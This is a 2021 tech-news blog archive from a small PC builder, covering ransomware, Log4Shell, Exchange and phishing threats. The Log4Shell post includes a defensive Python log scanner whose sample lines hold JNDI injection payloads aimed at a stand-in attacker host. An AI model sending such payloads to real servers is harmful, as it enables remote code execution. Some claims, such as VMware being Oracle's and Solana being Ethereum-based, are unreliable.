Tuesday, December 14, 2021

Kronos HR Management Platform hit by Ransomware

Kronos hit with ransomware, warns of data breach and 'several week' outage
The HR management platform has already informed major customers, like the city government of Cleveland, about the attack.

Kronos's software is used by many major corporations and local governments. Among its many clients are Tesla, the City of Cleveland, and hospitals and universities including Clemson, Temple and Winthrop University Hospital. These clients use Kronos work management software.

The ransomware attack has compromised employee information including names, addresses and Social Security numbers.

Worst of all, the outage is going to cause many to miss payroll this week. Not a pleasant thing during the holiday season.



These researchers wanted to test cloud security. They were shocked by what they found.

Cybersecurity researchers set up a tempting cloud honeypot to examine how cyber attackers work.

Cloud computing has become ubiquitous in business today. The problem is that the same lax password requirements and slack security practices are being carried over to the cloud by many companies. Recently, cybersecurity researchers at Palo Alto Networks set up a honeypot of 320 entry points around the world. A "honeypot" is something like a sacrificial lamb: a system deliberately exposed to attract cybercriminals so their behavior can be observed.

The honeypot used weak passwords, including the default passwords devices ship with from the factory, information that is readily available online. It was made up of common remote services, misconfigured to attract malicious actors.

It wasn't long before cybercriminals discovered the honeypot and set about exploiting it: some of the sites were compromised in minutes, 80% of the 320 honeypots were compromised within 24 hours, and all of them had been compromised within a week.

"The speed of vulnerability management is usually measured in days or months. The fact that attackers could find and compromise our honeypots in minutes was shocking. This research demonstrates the risk of insecurely exposed services," said Jay Chen, principal cloud security researcher at Palo Alto Networks. 


Intel 11th Generation based Workstations by Driving Force


Monday, December 13, 2021

Tech Giants Microsoft, Amazon and Others Warn of Widespread Software Flaw

This new flaw is called Log4Shell and it allows an attacker to gain entry into servers and computer systems without a password.  Within 12 hours of the Log4Shell exploit being found, hackers were already exploiting the vulnerability online.  Cybersecurity researchers say they have seen thousands of attempts to exploit the bug.

Online gaming sites are being exploited, and any cloud software operation is at risk. Amazon, Twitter and Cisco Systems are all working to protect users and study the threat against their systems.

Hackers started exploiting the flaw early Friday to gain access to servers running Microsoft's Minecraft gaming software. Security experts noticed the flaw being exploited in Minecraft when players used the chat feature: a few lines of text passed among players can penetrate the defenses of a targeted computer. The text is handled by Log4j, an open-source, Java-based logging utility.

Soon they observed widespread scanning and attempts to trigger the Log4j bug across the internet. In a note published Friday, Microsoft advised Minecraft users to upgrade their software to patch the bug.

IBM's Red Hat and Oracle's VMware are deploying patches. The flaw allows attackers to turn a computer's log files (files that track a computer's activities) into malicious instructions that force the machine to download software. Once this has happened, the attacker has access to the victim's network.

Be aware that the threat is against all internet-facing entities, and the problem is that each individual enterprise will have to patch its own servers and systems. Some companies have already begun patching, but this is not a coordinated, simultaneous fix, so some users will be at risk longer.
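Added example (not from the original post or from any vendor named above): a small Python log scanner showing how the attack text described above, a lookup placed in anything the server logs, can be spotted in ordinary web server logs, including when the keyword is hidden behind nested lookups or URL encoding. The log lines, hostnames and addresses are constructed for the example.

```python
import re
from urllib.parse import unquote
from typing import List, Tuple

# Log4j expands "${...}" lookups inside the text it logs. Log4Shell abuses the
# "${jndi:...}" lookup: once it lands in any logged field (a chat message, a
# User-Agent header, a URL) the logger reaches out to a server named in the
# text. Defenders therefore search the logs of internet-facing services for
# that lookup, after undoing the usual disguises.

# Innermost lookups only (no "${" inside), so nested forms resolve inside-out.
_LOOKUP_RE = re.compile(r"\$\{(?P<kind>[a-zA-Z]*):(?P<arg>[^${}]*)\}")
_DEFAULT_RE = re.compile(r"\$\{[^${}]*?:-(?P<val>[^${}]*)\}")   # ${x:-val}
_JNDI_RE = re.compile(r"\$\{jndi:")


def _resolve(match: "re.Match[str]") -> str:
    """Evaluate the few lookups commonly used to disguise the word jndi."""
    kind, arg = match.group("kind").lower(), match.group("arg")
    if kind == "lower":
        return arg.lower()
    if kind == "upper":
        return arg.upper()
    return match.group(0)            # jndi, env, date, ...: leave untouched


def normalize(text: str) -> str:
    """URL-decode, then flatten nested lookups until nothing changes."""
    text = unquote(unquote(text))    # covers single and double encoding
    prev = None
    while prev != text:
        prev = text
        text = _DEFAULT_RE.sub(lambda m: m.group("val"), text)  # ${::-j} -> j
        text = _LOOKUP_RE.sub(_resolve, text)                   # ${lower:J} -> j
    return text.lower()


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, normalized snippet) for each line with a JNDI lookup."""
    findings = []
    for number, line in enumerate(lines, start=1):
        flat = normalize(line)
        hit = _JNDI_RE.search(flat)
        if hit:
            findings.append((number, flat[hit.start():hit.start() + 60]))
    return findings


# Constructed sample access log (Apache/nginx combined format); addresses and
# hostnames are documentation/invalid ranges, not real systems.
SAMPLE_LOG = [
    # ordinary request
    '203.0.113.7 - - [13/Dec/2021:08:00:01 +0000] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    # the word alone, without lookup syntax: must not be flagged
    '203.0.113.8 - - [13/Dec/2021:08:00:02 +0000] "GET /docs/jndi.html HTTP/1.1" 200 900 "-" "docs-crawler/1.0"',
    # lookup placed in the User-Agent header
    '198.51.100.4 - - [13/Dec/2021:08:00:03 +0000] "GET / HTTP/1.1" 200 5123 "-" "${jndi:ldap://attacker.example.invalid/x}"',
    # the same thing hidden with a nested lookup
    '198.51.100.4 - - [13/Dec/2021:08:00:04 +0000] "GET / HTTP/1.1" 200 5123 "-" "${${lower:J}ndi:ldap://attacker.example.invalid/x}"',
    # URL-encoded and placed in the query string
    '198.51.100.5 - - [13/Dec/2021:08:00:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example.invalid%2Fx%7D HTTP/1.1" 200 5123 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for number, snippet in scan_log_lines(SAMPLE_LOG):
        print(f"line {number}: {snippet}")
```

A hit in a log is evidence of an attempt, not proof of compromise; the real fix remains patching Log4j on every system that uses it.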

Roblox, a popular gaming platform, was mentioned on the news this a.m.

Massive data breaches have become so common that we’ve gotten numb to reports detailing another hack or 0-day exploit. That doesn’t reduce the risk of such events happening, as the cat-and-mouse game between security experts and hackers continues. As some vulnerabilities get fixed, others pop up requiring attention from product and service providers. The newest one has a name that will not mean anything to most people. They call the hack Log4Shell in security briefings, which doesn’t sound very scary. But the new 0-day attack is so significant that some people see it as the worst internet hack in history.

“The internet’s on fire right now,” Adam Meyers told AP News. “People are scrambling to patch and all kinds of people scrambling to exploit it.”  Meyers is the senior vice president of intelligence at Crowdstrike, a cybersecurity company monitoring the Log4Shell hack. 

https://bgr.com/tech/internet-is-scrambling-to-fix-log4shell-the-worst-hack-in-history/

Because the bug is easy to exploit and attacks hard to block, the Log4j problem could be used by hackers to break into corporate networks for years to come, said Aaron Portnoy, principal scientist with the security firm Randori. “It is one of the most significant vulnerabilities that I’ve seen in a long time,” he said.

https://www.wsj.com/articles/tech-giants-microsoft-amazon-and-others-warn-of-widespread-software-flaw-11639260827?mod=hp_lead_pos10


DForce 11th Generation Intel unlocked Beasts!

Friday, December 3, 2021

Over a Million WordPress sites Hacked and Chip Shortage-Sky High Video cards prices - Crypto Mining

Over a million WordPress sites breached

UPDATED: WordPress site owners hosted by GoDaddy have had their data exposed -- for months.

https://www.zdnet.com/article/over-a-million-godaddy-managed-wordpress-sites-cracked/

and my experience with crypto mining

Alleged Chip Shortage and how to become a Crypto Millionaire or not.

The chip shortages affecting automobile production and computer pricing have been in the news lately. We've been told lots of stories about the cause, whether it's a supply chain issue or pandemic related. The chips used in auto manufacturing are supposedly low profit margin, and the chip makers are not thrilled about gearing up capacity to supply the auto makers. Ford is building a plant to make its own chips in the future. Tesla seems to be the only auto manufacturer not affected. I'm sure Elon Musk had already incorporated chip manufacturing in the company SOP.

Computer chips have steadily crept upward in prices, especially memory.  The computers Driving Force builds are 99% for business and don't require dedicated Graphics cards for business/cloud applications.

I recently built a new monster PC for myself so I could install and test Windows 11. At the time there were no video cards available, so I had to use an older Nvidia 750 Ti card. I thought gamers were eating up the available supply of video cards, causing shortages and steep prices. I tried searching for video cards with at least 4 GB, preferably 6 GB, of memory and they are sold out everywhere, Best Buy for example. In addition, the price has at least doubled. In July of 2019, I bought an Nvidia 1650 with 4 GB of RAM for $149.99 at Micro Center.




Today the same card will cost you at least $319 at Newegg, up to $390 for the same chipset.



and those are not the most expensive cards either, see below.



As I said above, I thought it was gamers causing video cards to be scarce and the chip shortage, but I was wrong. If you watch the stock market you know Nvidia and AMD stocks are some of the hottest ones to have. Both companies make GPUs (graphics processing units) and are experiencing no chip shortage.

The demand behind their products is Crypto Mining.  That's right, GPUs are more efficient at processing crypto transactions (mining) than computer CPUs.  I've a couple of SOL (Solana) mining machines running full time at my office, one is employing the Nvidia 1650 in my main machine and the other miner is a 3rd generation Intel Core i5 processor.  I had my monster AMD Ryzen 9 mining but the strain mining placed on the CPU was too high.  It affected performance significantly as well as generated a lot of heat from the processor.  I didn't want to risk the investment in my new AMD Ryzen 9 Windows 11 machine, mining is not lucrative enough with my present setup.

However, with the right video cards and enough of them one could make a lot of money mining.  That is why so many countries and even towns in certain US states have outlawed crypto mining.

As of today  12/3/21 at 6:30 a.m. EST, since 11/29/21 11:45 a.m.  I have mined almost $2 ($1.85 to be exact) of Solana, LOL.

There has been some down time.  My initial rig was my AMD machine,  I took it offline and established my main computer with the Nvidia 1650 as a miner.  (BTW, since I don't game I don't see much performance degradation using the GPU rather than the CPU), and yesterday I added a second miner using the old Intel Core i5 computer that plods along in another room happily mining.

So there you have it. Why there is a chip shortage:
  1. Chip manufacturers want to build GPUs, not low profit margin auto chips (now even Intel is developing a graphics chip).
  2. GPUs are in high demand by crypto miners.
And that's my story, I'm sticking to it.

I will follow up with another article soon about my mining software and how to build your own mining rig, and hopefully an update on extreme earnings if I can acquire the right video (GPU) card. I want to try an ETH (Ethereum) miner. BTW, Solana, which is currently at $236/coin, is an Ethereum-based altcoin.


Monday, November 8, 2021

Machine Performance suffering, try closing Chrome. Apples and PCs.

I have advised my clients for a year now to try the newest version of Microsoft Edge over Google's Chrome. Microsoft has rebuilt the Edge browser on Chromium, the same code base the Chrome browser is built on. This allows Edge to make use of the extensive library of extensions that have been written for Chrome.

There are more compelling reasons to use Edge or some other browser rather than Chrome.  At times my desktop computer's performance became sluggish to the point of "not responding".  What I have found is if I close Chrome the computer's performance returns.  I have multiple displays (3) and run multiple browsers, chiefly Edge, Chrome and Mozilla Firefox.  Recently I have installed the Brave browser and cut my use of Chrome.

I am writing this blog using Chrome (BlogSpot is Google's free blog platform), and when I check my system resources in use I find that Chrome is using more resources than Edge, even though I only have 3 tabs open compared to 9 tabs in Edge that are monitoring streaming data from various sites, see below.


Chrome has become bloated and now suffers the same performance issues as Microsoft's old Internet Explorer which killed Netscape and became the browser of choice in the 90's.

Microsoft's Edge is leaner and has released new features such as Vertical Tabs which I love on a widescreen monitor.

ZDNet has recently addressed Chrome's performance woes. Below are several links that should help you evaluate your own situation.

As always, thanks for reading.  I hope you find it informative.  Also, this issue applies to Apple computers as well as PC as mentioned in the first article.

Dumping Google Chrome? Here's the best browser to replace it

It seems that to quite a few of you, the idea of dumping Google Chrome for a browser -- even if that browser is better -- is like pulling wisdom teeth. Despite the fact that it's a bottomless pit when it comes to eating system resources and has become the bloated browser it was initially meant to replace, people love it.

https://www.zdnet.com/article/dumping-google-chrome-heres-the-best-browser-to-replace-it/

Ditching Google Chrome was the best thing I did this year (and you should too)

It was about a year ago that I began my transition away from Google Chrome (spoilers, I still need to use it, but I now use it minimally).

I disentangled my data and passwords out of the browser.  I tried a whole bunch of other browsers.  I learned and relearned a whole bunch of new muscle memory movements.

It was hard.  But it was worth it.

https://www.zdnet.com/article/ditching-google-chrome-was-the-best-thing-i-did-this-year-and-you-should-do-the-same-too/

Bye-bye, Chrome: 10 steps to help you switch to Microsoft's new Edge browser

If you've been looking for an option to dump Google's Chrome browser, consider Microsoft's new Edge browser, which delivers much of the same experience you get from Chrome, with a few features that are downright superior. Here's how to get started.

https://www.zdnet.com/article/bye-bye-google-chrome-10-steps-to-help-you-switch-to-the-new-edge-browser/


DForce Workstations - Windows 11 is now available on fast, reliable DForce Workstations 

DForce workstations feature matched Processors, Mainboards and SSDs to allow you to maximize performance.  Don't make the consumer based 6 month mistake, fast now, slow later.




Wednesday, June 2, 2021

June 8th: Amazon Sidewalk set to automatically share your internet with neighbors.

WHAT COULD POSSIBLY GO WRONG? —

Amazon devices will soon automatically share your Internet with neighbors. Amazon's experiment in wireless mesh networking turns users into guinea pigs.

If you have an Amazon Echo Dot, Show or any other Alexa activated device, you have less than a week to opt out of having your internet bandwidth automatically shared by Amazon in a huge mesh network.

On June 8th, unless you opt out by changing the default settings on your Amazon devices, the program known as "Amazon Sidewalk" will share your internet connectivity with those who do not have internet, as well as allowing you onto your neighbor's connection.

From the Amazon Sidewalk webpage:

Amazon Sidewalk is a shared network that helps devices like Amazon Echo devices, Ring Security Cams, outdoor lights, motion sensors, and Tile trackers work better at home and beyond the front door. When enabled, Sidewalk can unlock unique benefits for your device, support other Sidewalk devices in your community, and even locate pets or lost items.

The benefits of Amazon Sidewalk

Amazon Sidewalk creates a low-bandwidth network with the help of Sidewalk Bridge devices including select Echo and Ring devices. These Bridge devices share a small portion of your internet bandwidth which is pooled together to provide these services to you and your neighbors. And when more neighbors participate, the network becomes even stronger.

Devices in the program include not only Amazon's Echo dots and other smart speakers but Ring doorbells, security cams, Tile Trackers as well as others.

Amazon says the amount to be shared will be 1/40th of your bandwidth (80 kbps on a typical internet connection) and will cap the shared bandwidth at 500 MB (megabytes) per month.

Considering that few users ever look at or know how to access the default settings of their devices, expect nearly full coverage.

Amazon has published a white paper detailing the technical underpinnings and service terms that it says will protect the privacy and security of this bold undertaking. To be fair, the paper is fairly comprehensive, and so far no one has pointed out specific flaws that undermine the encryption or other safeguards being put in place. But there are enough theoretical risks to give users pause.

To read more, click on the following links:

https://arstechnica.com/gadgets/2021/05/amazon-devices-will-soon-automatically-share-your-internet-with-neighbors/

Amazon's Sidewalk Project

Amazon White Paper


Friday, May 28, 2021

SolarWinds hackers are at it again, targeting 150 organizations, Microsoft warns


Microsoft has reported that the same group responsible for the SolarWinds attack, "Nobelium", is at it again, this time distributing intrusion software via email purporting to be from USAID, the US aid agency.

This time they have compromised email systems linked to the State Department's international aid agency to send spear-phishing emails targeting agencies and individuals who have been identified as anti-Putin. The messages purport to be from former President Trump, with a bait link about election fraud.

If clicked the link delivers malicious files to compromise your system.  

It is reported that the targets are agencies and individuals who are anti-Putin. The email has a headline that proclaims (see picture below, courtesy NY Times):

The hackers are linked to Russia's main intelligence agency and the emails are being sent via the email system used by the State Department's international aid agency.

Hackers linked to Russia’s main intelligence agency surreptitiously seized an email system used by the State Department’s international aid agency to burrow into the computer networks of human rights groups and other organizations of the sort that have been critical of President Vladimir V. Putin, Microsoft Corporation disclosed on Thursday.

To read more, please visit the links below:

https://www.nytimes.com/2021/05/28/us/politics/russia-hack-usaid.html

https://www.nbcnews.com/tech/security/solarwinds-hackers-are-it-again-targeting-150-organizations-microsoft-warns-n1268893


If you don't have protection, please consider doing something,

https://www.malwarebytes.com/pricing/



Tuesday, May 18, 2021

Ransomware Attacks. Take advantage of all layers of protections afforded you.

Turn on anti-ransomware feature in Windows 10.

In light of the most recent high profile ransomware attack on the Colonial pipeline, what can you do to protect your organization from falling victim to a ransomware attack?

According to firewall manufacturer SonicWall, ransomware threats increased a massive 62 percent in 2020 compared to 2019, and they show no sign of slowing down. How many attacks? Over 304 million ransomware attacks in 2020, with the average payout over $220,000.

Of course, those are mainly businesses forking over that kind of money to attackers who are holding their data hostage. Small businesses in particular are disproportionately targeted, but facilitators of ransomware do also go after individuals.

One may think: if they can hack through the protection manned by large corporations, what can I do? The large corporations have deep pockets that make them lucrative targets. However, as stated above, individuals are targeted as well.

Windows 10 as well as most Security software firms have protections that provide extra layers of security but you must enable or properly configure them to work effectively.

You should routinely back up any important data and, as always, follow smart computing habits (like not clicking on links in unsolicited emails) to tip the odds in your favor.

Read about steps you can take below if you are running Windows 10 and if you own Kaspersky security software.

Monday, April 12, 2021

Criminals spread malware using website contact forms with Google URLs


Crooks are using social engineering to exploit workers' efforts to do their jobs.

If you use a contact form on your company website, please be aware that criminals are now using website contact forms to spread an info-stealing Trojan called IcedID. The ploy is to include legitimate Google URLs in the message and then require the recipient to sign in with their Google username and password.

IcedID is a banking trojan and information stealer and can be used as an entry point for subsequent attacks, such as manually operated ransomware for high-value targets. Human-operated ransomware attacks are increasingly common and require the attacker to sit at the keyboard and orchestrate the attack, in contrast to an automated attack.

In recent weeks, one of my clients experienced a rise in spam and phishing emails from their WordPress based website.  They implemented a CAPTCHA challenge to thwart the phishing and scam emails, however this new threat has the ability to bypass the CAPTCHA protection.

Microsoft considered the threat serious enough to report the attacks to Google's security teams to warn them that cyber criminals are using legitimate Google URLs to deliver malware. The Google URLs are useful to the attackers because they will bypass email security filters. The attackers appear to have also bypassed CAPTCHA challenges that are used to test whether the contact submission is from a human. 

The crooks are using social engineering to exploit workers' efforts to do their jobs, using language that applies pressure on the employee to respond.

One trick used is to falsely claim that the website is using copyrighted images.  We have already experienced this at one client.

This is an old ploy, but with a new twist. The email contains a link to a sites.google.com page. If the link is followed, a ZIP file containing a JavaScript file automatically downloads, and the script in turn downloads the IcedID malware as a .DAT file. A remote-control component, Cobalt Strike, is installed as well, which allows the attacker to control the device over the internet.


To read the full article at ZDNet, click on the following link:

Criminals spread malware using website contact forms with Google URLs | ZDNet



Tuesday, April 6, 2021

Facebook Data Breach exposes 533 million users data on Dark Web, Elon Musk's StarLink satellite internet coming soon to an area near you.

Facebook data on 533 million users posted online

Data on 533 million Facebook users, including phone numbers, Facebook IDs, full names, birth dates and other information, has been posted online.

Of the 533 million users whose data was leaked, 32.3 million US users and 11.5 million in the UK are affected.

The data was posted on a Dark Web site for free. The user information posted included:

"The information that was exposed includes profile information, Facebook identification numbers, emails, location data and more, according to a report in The Record, which is published by cyber-threat intelligence firm Recorded Future."

Facebook has reported that the information was collected in 2019 and that it has since found and patched the issue. However, as reported by ZDNet, how many users have changed their associated email addresses and phone numbers since 2019? Not many. Fortunately, SSNs are not required on Facebook, and any credit card info is hopefully outdated by now.

This "regurgitation" of an old, massive hack shows how vulnerable data can be once it's stolen.

On the Dark Web there is a massive market for buying and selling personal information. You can expect this data to be used in future phishing and hacking attacks.

For more info, read:

https://www.zdnet.com/article/facebook-data-on-533-million-users-posted-online/?ftag=TRE-03-10aaa6b&bhid=2219791&mid=13323985&cid=716603217

https://www.thestreet.com/latest-news/facebook-data-for-half-billion-users-emerge-on-dark-web

How to Check if Your Phone Number Is in the Huge Facebook Data Leak

https://gizmodo.com/how-to-check-if-your-phone-number-is-in-the-huge-facebo-1846617849

Starlink - Internet alternative

The Starlink satellite communications network moves closer to being a viable alternative as an internet provider replacement with each launch of SpaceX.  On each SpaceX mission, up to 60 satellites are being launched.  Starlink currently has 1321 in orbit with 12,000 more already approved and 30,000 more licenses applied for but not yet approved.

Elon Musk is accomplishing his goal at a cost much less than conventional satellites and Starlink's satellites are located in an orbit 60 times closer than conventional satellites.

I have signed up for the service, which is expected to be available in mid to late 2021. It costs an initial $99.00 and will be available on a first come, first served basis.

When signing up I had to find my location Plus Code which was something new to me.  Plus Codes are based on latitude and longitude, and displayed as numbers and letters. With a Plus Code, people can receive deliveries, access emergency and social services, or just help other people find them.  I have included a link to find your plus code below.

To read more:

With Starlink, Elon Musk Is Once Again Showing How To Make Economies Of Scale Work (forbes.com)

https://www.upi.com/News_Photos/view/upi/9561217701bca2fdc4eb07d2bceca2f6/SpaceX-Launches-Starlink-Satellites-From-the-Cape-Canaveral-Space-Force-Station-Florida/

https://maps.google.com/pluscodes/

Starlink

Shameless Plug: DForce Intel based Workstations

SSD equipped, Generation 9, 10 and 11

PDF - View or Download


Monday, March 8, 2021

Microsoft Exchange zero-day attacks: 30,000 servers hit already, says report

Some clients have reported an increase of junk/spam emails in the last week.  If your organization still uses an onsite Exchange server then you need to be aware that it needs to be patched now or taken offline.

The Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) has issued an order to agencies to apply the patches for on-premises Exchange systems or to simply disconnect vulnerable servers after seeing "active exploitation" of the vulnerabilities. In other words, patch now or cut off a vital communications tool.

So far, 4 previously unknown vulnerabilities are being used in attacks against thousands of companies, perhaps tens of thousands of organizations.

Microsoft released patches for a critical flaw last year and warned Exchange users to update their servers, but said that months later tens of thousands of servers remained unpatched despite attacks from nation-state hackers.

This latest attack is being carried out by a previously unknown group called Hafnium, which the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) thinks is based in China.

The Hafnium hackers have accelerated attacks on vulnerable Exchange servers since Microsoft released the patches.

CISA's former director thinks government agencies and small businesses will be more affected by these attacks than large enterprises.

To read the full article, please click on the following link:

https://www.zdnet.com/article/microsoft-exchange-zero-day-attacks-30000-servers-hit-already-says-report/?ftag=TRE-03-10aaa6b&bhid=2219791&mid=13291744&cid=716603217


If you haven't already seen an increase in spam activity, expect to and be careful that you don't open up your systems to an attack.  The following article details the most common ploys used to distribute malware and attacks.

Phishing: These are the most common techniques used to attack your PC

Microsoft Office macros, PowerShell and more are still proving to be popular with cyber criminals distributing attacks via phishing emails, warn researchers after analysing billions of attacks.

https://www.zdnet.com/article/phishing-these-are-the-most-common-techniques-used-to-attack-your-pc/

and it's not just PCs being attacked.

30,000 Macs infected with new Silver Sparrow malware

Silver Sparrow can even run on systems with Apple's new M1 chip.

"According to data provided by Malwarebytes, Silver Sparrow had infected 29,139 macOS endpoints across 153 countries as of February 17, including high volumes of detection in the United States, the United Kingdom, Canada, France, and Germany," 

https://www.zdnet.com/article/30000-macs-infected-with-new-silver-sparrow-malware/


Say it's not so! Windows 12 is coming in 2024. Apple iPhone malware/exploits.

Windows 12 is coming soon in 2024 I've read too many emails and articles hinting at a new Windows in the months leading up to 2024 and n...